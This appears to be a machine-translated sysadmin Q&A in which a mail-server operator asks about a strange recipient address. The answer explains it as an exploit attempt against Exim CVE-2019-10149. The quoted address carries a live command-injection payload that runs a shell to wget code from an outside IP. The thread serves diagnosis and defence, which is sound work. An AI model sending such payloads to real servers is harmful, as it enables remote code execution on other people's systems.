我运营着自己的邮件服务器,时不时有人会向 root 帐户发送垃圾邮件或神秘邮件。最近,我收到了一封空邮件,收件人是:
root+${运行{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f193.150.14.196x22}}@我的域名.tld
该字符串中的第二个 IP 地址似乎属于我租用服务器的同一托管服务。跑步和获得在我看来非常可疑,但我在互联网上没有发现任何有关此类攻击的信息。
根据服务器的邮件日志,该邮件是从 148.72.206.111 发送的。然而,从字段设置为[电子邮件保护]。
有人知道这是什么意思吗?
答案1
这是试图利用 Exim4 SMTP 服务器(v4.87 至 v4.91)中最近发现的一个错误,该错误将允许远程命令执行,因为 Exim 会${variable}在某些它实际上不应该扩展的地方扩展替换。(此语法在主 Exim 配置文件中广泛使用。)
该漏洞被称为CVE-2019-10149(它还没有商标名称或徽标)。如果您使用的是发行版中的 Exim4,那么您已经收到补丁了。由于您使用的是 Postfix,因此它不会对您造成影响。
(也就是说,即使在 Postfix 中,后面的参数也+经常用作命令行的一部分,例如在调用 Procmail 时。我可能会建议对你自己的服务器做一些测试,看看它如何处理像someuser+$(blah)@或 之类的事情someuser+`blah`@。)